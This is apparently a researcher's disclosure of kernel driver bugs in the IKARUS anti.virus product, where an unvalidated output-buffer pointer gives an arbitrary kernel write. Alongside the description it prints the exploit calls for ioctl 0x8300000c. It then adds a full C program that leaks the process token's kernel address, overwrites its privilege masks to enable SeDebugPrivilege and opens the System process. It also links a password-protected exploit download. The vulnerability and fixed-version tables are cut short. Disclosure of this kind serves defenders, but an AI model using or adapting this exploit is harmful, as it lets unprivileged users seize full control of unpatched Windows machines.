Here is a list of the 9 kernel vulnerabilities I discovered over a month ago in an antivirus product called IKARUS anti.virus, which have finally been fixed. Most of them stem from the same pattern: the driver saves the user-supplied output buffer address (Irp->UserBuffer) on the stack and later passes it to a subroutine as a write destination without validating it (a user-mode pointer has to be probed before the kernel writes through it), so an unprivileged caller gets a write to an arbitrary kernel address. The table below lists the ioctls, related CVE and type of vulnerability.

| IOCTL | CVE ID | Vulnerability Type |
|---|---|---|
| 0x83000058 | CVE-2017-14962 | Out of Bounds Write |
Fixed version numbers (vendor's advisory soon to be released):

| Vulnerable version | Fixed version |
|---|---|
I'm exploiting the vulnerable subroutine used by ioctl 0x8300000c to overwrite the _SEP_TOKEN_PRIVILEGES structure of our process token, where arg_20 is our inputted output buffer address.

In our process token's _SEP_TOKEN_PRIVILEGES structure I'm overwriting one byte in the "Present" field and one byte in the "Enabled" field with the hardcoded value 0x11 by calling the vulnerable subroutine twice, each time passing the kernel address of the target byte as the output buffer pointer. A privilege is only usable when its bit is set in both masks, which is why both bytes are written. The output buffer length is 0, so the I/O manager neither probes nor copies the pointer; only the driver touches it:

```c
DeviceIoControl(hDevice, 0x8300000c, NULL, 0, (LPVOID)PresentByteOffset, 0, &dwRetBytes, NULL); // byte in Present
DeviceIoControl(hDevice, 0x8300000c, NULL, 0, (LPVOID)EnableByteOffset,  0, &dwRetBytes, NULL); // byte in Enabled
```
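As an added example (my own code, not the author's exploit linked below), the following C program shows how a primitive that writes one fixed byte to an arbitrary kernel address is aimed at a token's _SEP_TOKEN_PRIVILEGES. Everything it relies on beyond the page is an assumption and is marked as such in the code: the Privileges member at offset 0x40 of _TOKEN (Windows 7 layout), Present/Enabled/EnabledByDefault as three consecutive 64-bit masks, SeDebugPrivilege (LUID 20) as the privilege to enable (the page does not say which privilege the 0x11 write targets), the token's kernel address leaked through NtQuerySystemInformation with SystemExtendedHandleInformation, and a placeholder device path because the page does not name the device. The portable helpers work out which byte of each mask a write of 0x11 has to land on and simulate the result on a copy of the structure; the Windows-only part leaks the token address and issues the two DeviceIoControl calls.

```c
/*
 * Added example, not the author's exploit. Assumptions (none stated on the page):
 *  - _TOKEN.Privileges at offset 0x40 (Windows 7 layout)
 *  - _SEP_TOKEN_PRIVILEGES = Present, Enabled, EnabledByDefault (3 x uint64_t)
 *  - target privilege is SeDebugPrivilege (LUID low part 20)
 *  - token kernel address leaked via NtQuerySystemInformation class 64
 */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SE_DEBUG_PRIVILEGE      20     /* LUID low part of SeDebugPrivilege */
#define HARDCODED_WRITE_VALUE   0x11   /* the byte the vulnerable ioctl writes */
#define TOKEN_PRIVILEGES_OFFSET 0x40   /* assumed offset of _TOKEN.Privileges */
#define DEVICE_PATH "\\\\.\\CHANGE_ME" /* placeholder: the page does not name the device */

/* Mirrors the kernel layout of _SEP_TOKEN_PRIVILEGES (assumed). */
typedef struct {
    uint64_t Present;
    uint64_t Enabled;
    uint64_t EnabledByDefault;
} SEP_TOKEN_PRIVILEGES;

/* The primitive writes a fixed byte, so pick the byte of the 64-bit mask that
 * holds the wanted privilege bit and make sure the fixed value has that bit set.
 * Returns the byte index (0..7) or -1 if the value cannot enable the privilege. */
int privilege_byte_index(unsigned privilege, uint8_t value)
{
    if (privilege >= 64) return -1;
    if (!((value >> (privilege % 8)) & 1)) return -1;
    return (int)(privilege / 8);
}

/* Kernel address of the byte to overwrite: token + Privileges offset
 * + member offset (Present = 0, Enabled = 8) + byte index within the mask. */
uintptr_t target_address(uintptr_t token_kaddr, size_t member_offset, int byte_idx)
{
    return token_kaddr + TOKEN_PRIVILEGES_OFFSET + member_offset + (uintptr_t)byte_idx;
}

/* Apply the two byte writes to a user-mode copy to see which bits 0x11 turns on
 * (little-endian: byte 2 covers bits 16..23). Returns 0 on a bad index. */
int simulate_writes(SEP_TOKEN_PRIVILEGES *p, int byte_idx, uint8_t value)
{
    if (byte_idx < 0 || byte_idx > 7) return 0;
    ((uint8_t *)&p->Present)[byte_idx] = value;
    ((uint8_t *)&p->Enabled)[byte_idx] = value;
    return 1;
}

/* A privilege is usable only when it is both Present and Enabled. */
int privilege_enabled(const SEP_TOKEN_PRIVILEGES *p, unsigned privilege)
{
    uint64_t bit = 1ULL << privilege;
    return (p->Present & bit) && (p->Enabled & bit);
}

#ifdef _WIN32
#include <windows.h>
/* Subset of the undocumented SystemExtendedHandleInformation (class 64) layout. */
typedef struct { PVOID Object; ULONG_PTR UniqueProcessId; ULONG_PTR HandleValue;
    ULONG GrantedAccess; USHORT CreatorBackTraceIndex; USHORT ObjectTypeIndex;
    ULONG HandleAttributes; ULONG Reserved; } HANDLE_ENTRY_EX;
typedef struct { ULONG_PTR NumberOfHandles; ULONG_PTR Reserved; HANDLE_ENTRY_EX Handles[1]; } HANDLE_INFO_EX;
typedef LONG (WINAPI *NtQSI_t)(ULONG, PVOID, ULONG, PULONG);

/* Leak the kernel object address behind one of our own handles (here the token). */
uintptr_t kernel_address_of_handle(HANDLE h)
{
    NtQSI_t NtQSI = (NtQSI_t)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation");
    ULONG len = 0x10000, ret = 0; HANDLE_INFO_EX *info = NULL; uintptr_t found = 0;
    for (;;) { /* grow the buffer until STATUS_INFO_LENGTH_MISMATCH (0xC0000004) stops */
        info = (HANDLE_INFO_EX *)realloc(info, len);
        LONG st = NtQSI(64, info, len, &ret);
        if (st == (LONG)0xC0000004) { len *= 2; continue; }
        if (st < 0) { free(info); return 0; }
        break;
    }
    for (ULONG_PTR i = 0; i < info->NumberOfHandles; i++)
        if (info->Handles[i].UniqueProcessId == GetCurrentProcessId() &&
            info->Handles[i].HandleValue == (ULONG_PTR)h) { found = (uintptr_t)info->Handles[i].Object; break; }
    free(info);
    return found;
}

int main(void)
{
    HANDLE hToken, hDev, hSys; DWORD ret;
    int idx = privilege_byte_index(SE_DEBUG_PRIVILEGE, HARDCODED_WRITE_VALUE);
    OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken);
    uintptr_t tok = kernel_address_of_handle(hToken);
    if (!tok || idx < 0) return 1;
    hDev = CreateFileA(DEVICE_PATH, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDev == INVALID_HANDLE_VALUE) return 1;
    /* Output buffer = kernel address, length 0: the I/O manager neither probes nor copies it. */
    DeviceIoControl(hDev, 0x8300000c, NULL, 0, (LPVOID)target_address(tok, 0, idx), 0, &ret, NULL);
    DeviceIoControl(hDev, 0x8300000c, NULL, 0, (LPVOID)target_address(tok, 8, idx), 0, &ret, NULL);
    /* Full access to the System process (PID 4) requires SeDebugPrivilege. */
    hSys = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 4);
    printf("SeDebugPrivilege %s\n", hSys ? "enabled" : "not enabled");
    return hSys ? 0 : 1;
}
#endif
```

Because 0x11 is 0b00010001, landing it on byte 2 of both masks sets bits 16 and 20, i.e. SeCreatePermanentPrivilege comes along with SeDebugPrivilege; a fixed-value write always enables every privilege whose bit is set in that byte, so check the side effects before choosing the target byte.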
The exploit can be downloaded from here [zip] (pass “ghh”) or from Exploit-DB when it gets published.